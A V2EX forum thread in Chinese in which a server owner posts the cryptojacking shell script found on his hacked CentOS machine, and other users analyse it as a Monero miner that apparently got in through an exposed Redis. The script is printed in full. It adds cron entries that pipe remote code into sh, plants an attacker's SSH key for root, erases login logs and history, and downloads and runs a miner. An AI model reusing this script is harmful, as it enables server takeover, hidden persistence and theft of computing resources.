首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
V2EX  ›  Linux

Linux 被黑了,来看看这是什么回事。。。

  •  
  •   dengshuang · 160 天前 · 7418 次点击
    这是一个创建于 160 天前的主题,其中的信息可能已经有所发展或是发生改变。

    系统 centos7

    今天看到服务器报警 68%的 cpu 被用。我也没干嘛啊。 用 htop 看到如下: 图片

    很浪啊,赶紧 kill -9 杀掉进程,单一下子就有起来了。 灵光一闪,查看 crontab,如图: crontab 用 crontab 里的链接下载了这个 sh:

    #!/bin/bash
    ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
    ps -ef | grep kworkers | grep -v grep | awk '{print $2}' | xargs kill -9
    skill -KILL udevs
    skill -KILL kworkers
    rm -rf /var/lib/apt/lists/*
    apt-get update
    apt-get install wget -y
    apt-get install libcurl4-openssl-dev -y
    apt-get install python-pip -y
    apt-get install ca-certificates -y
    apt-get install redis-tools -y
    apt-get install python gcc -y
    apt-get install python-setuptools python-dev build-essential -y --allow-unauthenticated
    yum -y install epel-release
    yum -y install wget gcc redis git python-pip ca-certificates
    echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/root
    echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    mkdir -p /root/.ssh/
    echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/crontabs/root
    echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/crontabs/root
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys
    PS3=$(iptables -L | grep 6379 | wc -l)
    if [ $PS3 -eq 0 ];
    then
    yum -y install iptables-services
    iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
    iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
    service iptables save
    /etc/init.d/iptables-persistent save
    fi
    echo "" > /var/log/wtmp
    echo "" > /var/log/secure
    history -c
    if [ ! -f "/tmp/migrations" ];then
    wget https://transfer.sh/SstPD/clay  --no-check-certificate -O /tmp/clay && chmod +x /tmp/clay
    wget https://transfer.sh/q4oJN/nodexx --no-check-certificate -O /tmp/migrations && chmod 777 /tmp/migrations
    curl -sk https://transfer.sh/q4oJN/nodexx -o /tmp/migrations && chmod 777 /tmp/migrations
    fi
    cd /tmp
    PS1=$(ps aux | grep clay | grep -v "grep" | wc -l)
    if [ $PS1 -eq 0 ];
    then
        /tmp/clay &
    fi
    PS2=$(ps aux | grep migrations | grep -v "grep" | wc -l)
    if [ $PS2 -eq 0 ];
    then
        /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
    fi
    if [ $? -ne 0 -a $PS2 -eq 0 ];
    then
    wget https://transfer.sh/pQMdB/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/glibc-2.14.tar.gz -C / && export LD_LIBRARY_PATH=/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B && echo "" > /var/log/wtmp && echo "" > /var/log/secure && history -c 
    fi
    if [ $PS3 -eq 0 ];
    then
    yum -y install iptables-services
    iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
    iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
    service iptables save
    /etc/init.d/iptables-persistent save
    fi
    
    
    

    各位猜猜他是不是要挖矿。 我现在只是把外网用防火墙给卡断了,想仔细研究研究他到底在干嘛

    45 回复  |  直到 2018-04-19 08:38:37 +08:00
        1
    dengshuang   160 天前   ♥ 3
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys

    这一条很是邪恶啊
        2
    henryshen233   160 天前
    @dengshuang 拽了
        3
    henryshen233   160 天前
    我说一楼
        4
    u5f20u98de   160 天前   ♥ 1
    看样子的确是被拿来挖矿了,看命令是用了一个未授权访问的 redis 漏洞(因为替你把 6379 关上不让别人搞)
        5
    hcymk2   160 天前   ♥ 1
    xmr 门罗币
        6
    doun   160 天前 via Android   ♥ 1
    pool.zer0day.ru:8080 这个好像是挖矿的。找到漏洞了吗怎么被搞的?
        7
    wampyl   160 天前
    被拿来挖矿了
        8
    Felldeadbird   160 天前
    @u5f20u98de 良心黑产脚本?
        9
    murusu   160 天前   ♥ 2
    被人拿来当矿机了
    很奇怪的是你这机子允许 root 帐号远程登录?
        10
    bearqq   160 天前 via Android
    Stratum 字样挖矿无疑
    有可能是 ssh 密码破解搞进来的,别的弱密码也可能,1day 漏洞也可能看你更新不。
        11
    jasonyang9   160 天前   ♥ 2
    ```
    /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
    ```

    还保留了 15%CPU 给你用,良心啊
        12
    hcymk2   160 天前
    echo "" > /var/log/wtmp
    echo "" > /var/log/secure
    history -c
        13
    geagerg   160 天前   ♥ 1
    见过个类似的,看看是不是 redis 开了外网访问但是没设密码或者弱密码或或者配置文件有误未生效
        14
    dengshuang   160 天前   ♥ 1
    @murusu 不是这是内网的电脑,当时通过代理,把 6379 端口 redis 代理出去了。redis 是用 root 运行的。
        15
    dengshuang   160 天前
    @jasonyang9 尴尬,哈哈
        16
    EXE   160 天前   ♥ 1
    前几天服务器刚中了挖门罗币的病毒,而且用的还是 docker 来跑的。。。
        17
    jingdaihuaxia   160 天前
    被挖矿了?
        18
    u5f20u98de   160 天前
    @Felldeadbird 不是良心,是怕被别家黑客工具用了,竞争也很激烈啊。
        19
    4ever911   160 天前
    我前几天配置的 SS 也被黑了用作 ddos,客服发 email 说关停了我的机器,我上去一看,几个小时打了 300G 流量。。。。。 也不知道是如何黑的,后来果断重新弄了一台,关了 root 远程登录,关闭密码登陆。
        20
    nicevar   160 天前
    估计是 ssh 被爆破进入的
        21
    Rootcat   160 天前
    看了这个,我竟然想到的是拿我闲置的服务器来挖门罗币,不知道能挖多少。。。
        22
    lopetver   160 天前
    migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B

    这条命令已经说明是在挖矿了
        23
    kongkongyzt   160 天前
    @dengshuang #1 +1, 刚想回这个, 这条 hhh
        24
    lopetver   160 天前
    @kongkongyzt 求解这条是什么意思
        25
    FindBoyFriend   160 天前
    一项喜欢用 keys 登陆 ssh,就差两步验证了
        26
    f2f2f   160 天前
    @jasonyang9 然而即便留了 15% 很多商家还是会直接把这样的 vps 给 suspend 了 #滑稽
        27
    imaning   160 天前
    @Rootcat 照这么说,我手上有 3 台服务器,都是闲置的,我也该去试试挖矿?
        28
    king2014   160 天前
    @lopetver 直接加入自己的密钥,可以随时登录了,不需要密码
        29
    dengshuang   160 天前
    @lopetver 免密码 登陆
        30
    airycanon   160 天前
    你是不是用 root 启动 redis 了并且对外网是开放的?
        31
    sdzwb   160 天前
    这是服务器被入侵,同时用于挖矿的步骤啊。
    要杜绝还得找服务器漏洞的根源,然后再去堵。
        32
    YMB   160 天前
    前段时间研究过 redis 漏洞,但新版本貌似怎么都不能生效,楼主 redis 版本是多少?
    有可疑 key 之类的一些信息吗,有的话麻烦提供一下大家研究研究
        33
    ZackB0T   160 天前 via Android
    最简单的方式,云墙 设置下 ssh 端口么? ip 或者 IP 段放行。
    挖门罗的
    打算挖的,给你个参考,G620 CentOS 倆核算力 50,如果支持 aes 能快不少。但是 cpu 自己挖电费回不来,矿池一般 0.3 提,这算力基本一年提不出来。
        34
    YumeMichi   160 天前
    让我想起我司一台测试服务器上的 redis 没有设置密码 然后因为版本也不是最新的 就被人利用漏洞种过挖矿程序
        35
    Miy4mori   160 天前
    @Felldeadbird 你怎么理解到良心的,明显怕后来人把自己蹬了啊。
        36
    jeffson   160 天前
    stratum+tcp://pool.zer0day.ru:8080 必然是挖矿啊
        37
    lusi1990   160 天前 via Android
    我也被黑锅,cpu 占用了 100%
        38
    DeWhite   160 天前
    @jasonyang9 我之前查日志菜发现 只被用了 50%,这不算良心
        39
    projectzoo   160 天前
    @dengshuang #1 有点意思,这个。。
        40
    msg7086   160 天前
    无密码全球公开 root 账户运行的 redis,不拿来挖矿难道还留着过年?
        41
    defunct9   160 天前 via iPhone
    挖门罗币种的

    开 ssh,让我上去也挖挖
        42
    winglight2016   159 天前
    一般 VPS 都会禁止挖矿的
        43
    henryshen233   159 天前
    @4ever911 上次我的 Linode 也流量暴涨,后来只开放必要端口就好了
        44
    xiayun   159 天前
    挖矿的,应该是利用 redis 端口漏洞进来的,因为 redis 默认是不用用户密码的
        45
    infra   158 天前
    被偷挖挖门罗币了
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   1635 人在线   最高记录 3762   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.1 · 20ms · UTC 02:13 · PVG 10:13 · LAX 19:13 · JFK 22:13
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1